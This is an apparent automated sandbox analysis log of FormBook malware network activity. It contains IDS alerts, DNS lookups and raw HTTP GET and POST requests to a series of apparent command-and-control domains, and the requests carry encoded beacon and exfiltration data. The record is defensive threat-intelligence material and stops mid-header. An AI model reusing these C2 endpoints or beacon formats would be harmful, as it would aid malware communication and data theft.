Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49713 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49734 -> 13.248.169.48:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.nullus.xyz
Source:	DNS query: www.corsix.xyz
Source:	DNS query: www.iquery.xyz

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 154.204.240.200 154.204.240.200
Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesBpx-Id: 1741384849852158923-657-82628-47-0Content-Encoding: gzipContent-Length: 616Content-Type: text/htmlDate: Fri, 07 Mar 2025 22:00:39 GMTEtag: "80dd84e38ea6d51:0"Last-Modified: Fri, 29 Nov 2019 08:27:51 GMTServer: borderproxyVary: Accept-EncodingX-Powered-By: ASP.NETConnection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae b3 6a da 5e af f2 74 de 2e ca a3 e4 31 7e a4 65 b6 bc f8 ec a3 7c f9 11 3e c8 b3 d9 51 92 d2 f3 78 91 b7 59 3a 9d 67 75 93 b7 9f 7d b4 6e cf b7 0f a8 05 7d 93 3e 6e 8b b6 cc 8f 5e 66 17 79 fa a2 6a d3 67 d5 7a 39 7b 7c 57 3e 95 16 fc f2 32 5b e4 9f 7d 74 59 e4 57 ab aa 6e 3f 4a a7 d5 b2 cd 97 04 ec aa 98 b5 f3 cf 66 f9 65 31 cd b7 f9 8f 51 5a 2c 8b b6 c8 ca ed 66 9a 95 f9 67 bb a6 ab a6 bd 06 50 fe 03 cf b7 d2 5f 6c 7f c7 53 16 cb 7c 7b 9e 17 17 f3 f6 51 ba 3b de 3b 0c be 5d 64 f5 45 b1 7c 94 ee b8 8f 7f 89 83 c5 a3 0f c1 4d ab b2 aa 1f a5 3f 7e 70 70 e0 5e c1 33 2b 9a 55 99 5d 3f 4a db 6c 52 e6 e1 77 e7 34 ae ed f3 6c 51 94 f4 7d 93 2d 9b ed 26 af 8b f3 b0 91 c5 71 67 e7 77 0f bf 69 f3 77 ed 76 56 16 17 84 e8 94 e8 93 d7 e1 f7 4c a0 ee 8b de 30 26 d5 ec ba 33 8c 10 db ed 69 5e 96 ee 55 3c 97 79 dd 16 44 69 d3 ef a2 98 cd ba c3 32 c4 db cb 17 69 b6 6e 2b f7 ad d7 f9 7c b7 d3 b5 a1 e0 fd fb f7 dd 0b 78 98 4a 4d f1 83 9c 21 46 be bb 52 0a ed ef c4 a7 6b d5 e9 c9 e0 b7 d3 c1 0e 8f d2 6c ef 60 67 f5 ce 7d e3 01 fb 3d 17 f9 ac c8 d2 6a 59 5e a7 cd b4 ce f3 65 9a 2d 67 e9 d6 22 7b 27 1c a9 2f df a1 4e ed 4b 78 40 ed 51 0f 17 3c fa da c3 fb de 34 e1 f1 7a c5 d3 a3 18 1e 26 80 10 67 77 7c bf 4b 1e 3c 6e b4 f4 df f8 5e b7 89 d7 89 fe fa f8 ae ca ce e3 bb 22 d5 8f 81 ba 8a d5 7c b7 27 be f4 91 7c b7 3a 7a 5d d5 35 0d 72 b2 6e d3 76 9e a7 2b b4 bc ae d6 e9 55 5e e7 69 5b 5f 17 cb 8b b4 ad 52 48 76 3a ab f2 26 5d 12 98 fc 5d d1 b4 e3 c7 77 57 d4 d3 5d e9 8a 80 92 88 1d fd 3f 6f df f5 19 77 04 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~\|?"j^t.1~e\|>QxY:gu}n}>n^fyjgz9{\|W>2[}tYWn?Jfe1QZ,fgP_lS\|{Q;;]dE\|M?~pp^3+U]?JlRw4lQ}-&qgwiwvVL0&3i^U<yDi2in+\|xJM!FRkl`g}=jY^e-g"{'/NKx@Q<4z&gw\|K<n^"\|'\|:z]5rnv+U^i[_RHv:&]]wW]?ow
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesBpx-Id: 1741384852401263042-657-82628-47-0Content-Encoding: gzipContent-Length: 616Content-Type: text/htmlDate: Fri, 07 Mar 2025 22:00:42 GMTEtag: "80dd84e38ea6d51:0"Last-Modified: Fri, 29 Nov 2019 08:27:51 GMTServer: borderproxyVary: Accept-EncodingX-Powered-By: ASP.NETConnection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae b3 6a da 5e af f2 74 de 2e ca a3 e4 31 7e a4 65 b6 bc f8 ec a3 7c f9 11 3e c8 b3 d9 51 92 d2 f3 78 91 b7 59 3a 9d 67 75 93 b7 9f 7d b4 6e cf b7 0f a8 05 7d 93 3e 6e 8b b6 cc 8f 5e 66 17 79 fa a2 6a d3 67 d5 7a 39 7b 7c 57 3e 95 16 fc f2 32 5b e4 9f 7d 74 59 e4 57 ab aa 6e 3f 4a a7 d5 b2 cd 97 04 ec aa 98 b5 f3 cf 66 f9 65 31 cd b7 f9 8f 51 5a 2c 8b b6 c8 ca ed 66 9a 95 f9 67 bb a6 ab a6 bd 06 50 fe 03 cf b7 d2 5f 6c 7f c7 53 16 cb 7c 7b 9e 17 17 f3 f6 51 ba 3b de 3b 0c be 5d 64 f5 45 b1 7c 94 ee b8 8f 7f 89 83 c5 a3 0f c1 4d ab b2 aa 1f a5 3f 7e 70 70 e0 5e c1 33 2b 9a 55 99 5d 3f 4a db 6c 52 e6 e1 77 e7 34 ae ed f3 6c 51 94 f4 7d 93 2d 9b ed 26 af 8b f3 b0 91 c5 71 67 e7 77 0f bf 69 f3 77 ed 76 56 16 17 84 e8 94 e8 93 d7 e1 f7 4c a0 ee 8b de 30 26 d5 ec ba 33 8c 10 db ed 69 5e 96 ee 55 3c 97 79 dd 16 44 69 d3 ef a2 98 cd ba c3 32 c4 db cb 17 69 b6 6e 2b f7 ad d7 f9 7c b7 d3 b5 a1 e0 fd fb f7 dd 0b 78 98 4a 4d f1 83 9c 21 46 be bb 52 0a ed ef c4 a7 6b d5 e9 c9 e0 b7 d3 c1 0e 8f d2 6c ef 60 67 f5 ce 7d e3 01 fb 3d 17 f9 ac c8 d2 6a 59 5e a7 cd b4 ce f3 65 9a 2d 67 e9 d6 22 7b 27 1c a9 2f df a1 4e ed 4b 78 40 ed 51 0f 17 3c fa da c3 fb de 34 e1 f1 7a c5 d3 a3 18 1e 26 80 10 67 77 7c bf 4b 1e 3c 6e b4 f4 df f8 5e b7 89 d7 89 fe fa f8 ae ca ce e3 bb 22 d5 8f 81 ba 8a d5 7c b7 27 be f4 91 7c b7 3a 7a 5d d5 35 0d 72 b2 6e d3 76 9e a7 2b b4 bc ae d6 e9 55 5e e7 69 5b 5f 17 cb 8b b4 ad 52 48 76 3a ab f2 26 5d 12 98 fc 5d d1 b4 e3 c7 77 57 d4 d3 5d e9 8a 80 92 88 1d fd 3f 6f df f5 19 77 04 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~\|?"j^t.1~e\|>QxY:gu}n}>n^fyjgz9{\|W>2[}tYWn?Jfe1QZ,fgP_lS\|{Q;;]dE\|M?~pp^3+U]?JlRw4lQ}-&qgwiwvVL0&3i^U<yDi2in+\|xJM!FRkl`g}=jY^e-g"{'/NKx@Q<4z&gw\|K<n^"\|'\|:z]5rnv+U^i[_RHv:&]]wW]?ow
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKAccept-Ranges: bytesBpx-Id: 1741384854976856865-657-82628-47-0Content-Encoding: gzipContent-Length: 616Content-Type: text/htmlDate: Fri, 07 Mar 2025 22:00:44 GMTEtag: "80dd84e38ea6d51:0"Last-Modified: Fri, 29 Nov 2019 08:27:51 GMTServer: borderproxyVary: Accept-EncodingX-Powered-By: ASP.NETConnection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae b3 6a da 5e af f2 74 de 2e ca a3 e4 31 7e a4 65 b6 bc f8 ec a3 7c f9 11 3e c8 b3 d9 51 92 d2 f3 78 91 b7 59 3a 9d 67 75 93 b7 9f 7d b4 6e cf b7 0f a8 05 7d 93 3e 6e 8b b6 cc 8f 5e 66 17 79 fa a2 6a d3 67 d5 7a 39 7b 7c 57 3e 95 16 fc f2 32 5b e4 9f 7d 74 59 e4 57 ab aa 6e 3f 4a a7 d5 b2 cd 97 04 ec aa 98 b5 f3 cf 66 f9 65 31 cd b7 f9 8f 51 5a 2c 8b b6 c8 ca ed 66 9a 95 f9 67 bb a6 ab a6 bd 06 50 fe 03 cf b7 d2 5f 6c 7f c7 53 16 cb 7c 7b 9e 17 17 f3 f6 51 ba 3b de 3b 0c be 5d 64 f5 45 b1 7c 94 ee b8 8f 7f 89 83 c5 a3 0f c1 4d ab b2 aa 1f a5 3f 7e 70 70 e0 5e c1 33 2b 9a 55 99 5d 3f 4a db 6c 52 e6 e1 77 e7 34 ae ed f3 6c 51 94 f4 7d 93 2d 9b ed 26 af 8b f3 b0 91 c5 71 67 e7 77 0f bf 69 f3 77 ed 76 56 16 17 84 e8 94 e8 93 d7 e1 f7 4c a0 ee 8b de 30 26 d5 ec ba 33 8c 10 db ed 69 5e 96 ee 55 3c 97 79 dd 16 44 69 d3 ef a2 98 cd ba c3 32 c4 db cb 17 69 b6 6e 2b f7 ad d7 f9 7c b7 d3 b5 a1 e0 fd fb f7 dd 0b 78 98 4a 4d f1 83 9c 21 46 be bb 52 0a ed ef c4 a7 6b d5 e9 c9 e0 b7 d3 c1 0e 8f d2 6c ef 60 67 f5 ce 7d e3 01 fb 3d 17 f9 ac c8 d2 6a 59 5e a7 cd b4 ce f3 65 9a 2d 67 e9 d6 22 7b 27 1c a9 2f df a1 4e ed 4b 78 40 ed 51 0f 17 3c fa da c3 fb de 34 e1 f1 7a c5 d3 a3 18 1e 26 80 10 67 77 7c bf 4b 1e 3c 6e b4 f4 df f8 5e b7 89 d7 89 fe fa f8 ae ca ce e3 bb 22 d5 8f 81 ba 8a d5 7c b7 27 be f4 91 7c b7 3a 7a 5d d5 35 0d 72 b2 6e d3 76 9e a7 2b b4 bc ae d6 e9 55 5e e7 69 5b 5f 17 cb 8b b4 ad 52 48 76 3a ab f2 26 5d 12 98 fc 5d d1 b4 e3 c7 77 57 d4 d3 5d e9 8a 80 92 88 1d fd 3f 6f df f5 19 77 04 00 00 Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~\|?"j^t.1~e\|>QxY:gu}n}>n^fyjgz9{\|W>2[}tYWn?Jfe1QZ,fgP_lS\|{Q;;]dE\|M?~pp^3+U]?JlRw4lQ}-&qgwiwvVL0&3i^U<yDi2in+\|xJM!FRkl`g}=jY^e-g"{'/NKx@Q<4z&gw\|K<n^"\|'\|:z]5rnv+U^i[_RHv:&]]wW]?ow

Source: global traffic	HTTP traffic detected: GET /wdz1/?56e87=VDD8OJ4H&CjuXKjB=a6zPArAcs68qsFGtTabzjyCobuMFh5AYI73tX7gtoPhGMe+Sl7/r92yDmXcH3BaZwyNUFPurN2KphsWf6vvA6fvZUSnh3QpL9dKDFXQtxsl2/KHzlz9zut+LhsKtEL2uwL2KJOU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.sigaque.todayUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /y53x/?CjuXKjB=cWswSZ7aAp39sdbsXGpuMMMt6/LJxIwKTa77z9r2je/R8wToat4sLl9UjfzaI1DjumgV6JrtanxkqUlrlKUlt0UAUIvQZNE5jku/6hcokxcXJ9kJUPI1/76KAS44PRXUsV5W8mw=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.nullus.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /gdgz/?CjuXKjB=50Eo+msjPTmNUMxLWGXNaz1nFocCQ8nxM05nGxnVo3BrR895ogfIkjGz36VyZvQOtFEwQIJ3T4aIkZIC5BPLf/rPYAmESkb+wnrJPQ4l4mh7FCrlZI5BK7u424OCCIVxsULVgD0=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.innonow.websiteUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /tg7i/?CjuXKjB=W2lXFIPTRr4gesb5cwI0krzgLd36/9TbdyzTPi7nE0Z5NBEW+2FqYkNVo2Q4JiMVFhBrIV5cFAVL+yjFEQTGcK1oj27Lp27mt6TrOGKKvTfWhv2gr//jTvVuirH6o25Z8PLwJAA=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.dangky88kfree.onlineUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /iif1/?CjuXKjB=klM6TdPPz68Qx1ZvAld+VtgNPFdZa/BGoL0cQlE+3VAfrj7achUTu3KL8ieMqkSdt6978kPg0kIQ4tHFfwFwVTqYF76bAi/NyVxsiZnxPA9igYE2IIENW1bg6TEHAuGn10MLWR0=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.goodparents.netUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /mlxj/?CjuXKjB=RVQtV5Q1ZJvg3YjHwjyEAPKjZoJ2KRe/Amx3hxV3ESE0t+tivGZBcDdBTtP7FcndEQ+IiopfuiJ6f3Unh+B+gSFSRnKofjdEd07+Gzh0IfXrPmZB8I+UZ0Wx+xMoYJ6BmJESvVI=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corsix.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /fowj/?56e87=VDD8OJ4H&CjuXKjB=5sXdoS8n4C3E6/rguliEdK39o6eQOzkylfRlt2No+gnm2EdwP7YqbswwmdG7xOEtLQJjdyw/1NREyw/KjgaFKxN3jNHd0X0QLn30FsNoioE/elM5lQNmh0J1JMvKt8pM0v5hF9A= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fjlgyc.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /p72h/?CjuXKjB=JBoasVqKMP/Tm9QoX+fzNGnUmdUkCFWsb5GUbFkhjKP5vsoVxEayp9YB9sG2XQZlNTDSgP5Ox1enp0SBoNbp1launwo2DlaU759DgYflM8WUARfDZqc4yZ8IOO3CnY+8e5nydM4=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bjogo.topUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /0n2g/?CjuXKjB=fvZ7+iIC/TOHFCeFeBmLTEXsD3edtPY9OBxgr9LtykBa/CvCN5KBqrWYP+FQ6Pf4ssQMikZiOSwwxUN4REJawbXZhtEcjvnJZjvhmlYUu221S6iTRVzTzmyIZ7TjgG/a+0slBoM=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.j8g5rjpc.topUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /q9z3/?CjuXKjB=6c2q/ZaRCojWtSDUcFJaeSuS2BTYhBVfnju0A/12YyB1KLUbQAPCNSUudSPB9fQ66/9RirTsfxpMYqMehyH8ZO8kGkGnQ0Y5J6LDCAkZFl55Zs8XdgXc3cXy6zzfc0r1Ct2IQNk=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.mamiofficial.clickUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /b6lp/?56e87=VDD8OJ4H&CjuXKjB=arOSZ/aZjFOIvQRY69DNNyuUiv5jjem2um+eBhx+733JBm31j6JLJ59OPZhYdXyw/lnqiSNjCITdwDNb+lYg7rfogT0dpOyAKgcolLV+bUO+gWL3ZF8aP7y1kiXIU6MqOXeLcBc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corellia.proUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lqfq/?CjuXKjB=wVuWj6gbMVyL7sYNE4rzfjuNAQrl0Rjcu4wDZtceGg1vVt/9QQhmvnxl/mnGRhFfs7QMEr17nlh/JXtPuAN65VZt3pTRX/DsQz+cEXx78FrEkXpg6Un/GdIYe46sRS7bsvJoShg=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.newanthoperso.shopUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /lz2d/?CjuXKjB=opnwfoEXagE4Vi0oQoyzv9KQZj5ON4gkmp1/l3SJnZ7Dz4RLF9x8L0AYDkJWUBNclOZ54PoxRZ0rsNxBrA9sqdGzXb1nEuZspURWvpXhvmzZe8G2VroAgr8kf7nP1UmdC+ym8p4=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.iquery.xyzUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ifpv/?CjuXKjB=HncMFlglP6BvH5EZgZU2oChwshoIBBmJLVytKzJt2/sW7+iT80TqqFDetVY/7D0w9Gd6WvxE3pww0bWyITp0v5BqGAzmojfD4vw55tVIRTGMIEvQUtOd0oSRXrVxgwqLCITsywY=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.luittard-le-mode.shopUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /w5wx/?CjuXKjB=TYpBuhpwnP9LeBAfIIQHi4b8MaE92Ht78YPwdNoW7rLxpWx/PnPfwnRiO6yU1FmY7NNamMRjNjI1P9VPL8UQ2N3gC6vL/3tJxyZzY/rQDMd0vT9Yt7DW3kKy3w72k9uwKcUWUpI=&56e87=VDD8OJ4H HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeHost: www.btbjpu.infoUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36

Source: lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3693055409.000000000367A000.00000004.00000001.00040000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.sigaque.today
Source: global traffic	DNS traffic detected: DNS query: www.nullus.xyz
Source: global traffic	DNS traffic detected: DNS query: www.innonow.website
Source: global traffic	DNS traffic detected: DNS query: www.dangky88kfree.online
Source: global traffic	DNS traffic detected: DNS query: www.goodparents.net
Source: global traffic	DNS traffic detected: DNS query: www.corsix.xyz
Source: global traffic	DNS traffic detected: DNS query: www.fjlgyc.info
Source: global traffic	DNS traffic detected: DNS query: www.bjogo.top
Source: global traffic	DNS traffic detected: DNS query: www.j8g5rjpc.top
Source: global traffic	DNS traffic detected: DNS query: www.mamiofficial.click
Source: global traffic	DNS traffic detected: DNS query: www.corellia.pro
Source: global traffic	DNS traffic detected: DNS query: www.newanthoperso.shop
Source: global traffic	DNS traffic detected: DNS query: www.iquery.xyz
Source: global traffic	DNS traffic detected: DNS query: www.luittard-le-mode.shop
Source: global traffic	DNS traffic detected: DNS query: www.btbjpu.info
Source: global traffic	DNS traffic detected: DNS query: www.maceoconsultores.net

Source: unknown

HTTP traffic detected: POST /y53x/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cache-Control: no-cacheContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 212Host: www.nullus.xyzOrigin: http://www.nullus.xyzReferer: http://www.nullus.xyz/y53x/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; XT907 Build/KDA20.62-15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 43 6a 75 58 4b 6a 42 3d 52 55 45 51 52 75 6a 50 41 36 76 56 39 76 4c 73 54 6c 30 72 50 5a 30 41 37 65 72 4b 77 6f 4e 2b 51 4c 79 39 78 6f 50 66 73 4f 2f 59 36 56 4b 4e 62 4b 41 45 4d 45 42 69 76 2f 65 47 42 47 76 42 6a 69 51 58 37 5a 48 42 64 58 42 7a 6f 6b 56 77 70 66 59 49 36 56 45 4a 51 2b 48 44 42 63 73 4b 68 6e 37 74 2f 30 5a 61 6e 54 4e 68 4a 4f 73 66 53 72 6b 42 7a 6f 79 4e 57 51 55 32 66 44 66 6e 78 79 52 65 6d 6a 7a 4c 65 73 31 45 79 5a 4b 65 66 68 78 6c 44 6d 73 42 35 54 62 43 69 30 59 44 2b 51 46 42 6c 70 44 31 77 78 6f 77 32 44 73 62 6a 55 41 68 74 69 2b 67 53 67 55 31 6b 75 42 65 55 51 43 6e 49 43 54 52 73 6b 63 75 Data Ascii: CjuXKjB=RUEQRujPA6vV9vLsTl0rPZ0A7erKwoN+QLy9xoPfsO/Y6VKNbKAEMEBiv/eGBGvBjiQX7ZHBdXBzokVwpfYI6VEJQ+HDBcsKhn7t/0ZanTNhJOsfSrkBzoyNWQU2fDfnxyRemjzLes1EyZKefhxlDmsB5TbCi0YD+QFBlpD1wxow2DsbjUAhti+gSgU1kuBeUQCnICTRskcu

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 07 Mar 2025 21:58:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vT5JsXLd4zNN1AzX19paVJURCokRe10v%2BED2Ays6E6VFN3s7i%2B8ay784qpvnTDYYVGgBiVebnrox%2FAQrVyi7y7bGohJaFQbMk0Bh%2Fxqel%2Fp7%2FMdapsGG0i%2Bu0wT825QSoaaCSg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cd5b1b59d98c15-EWRalt-svc: h3=":443"; ma=86400server-timing: 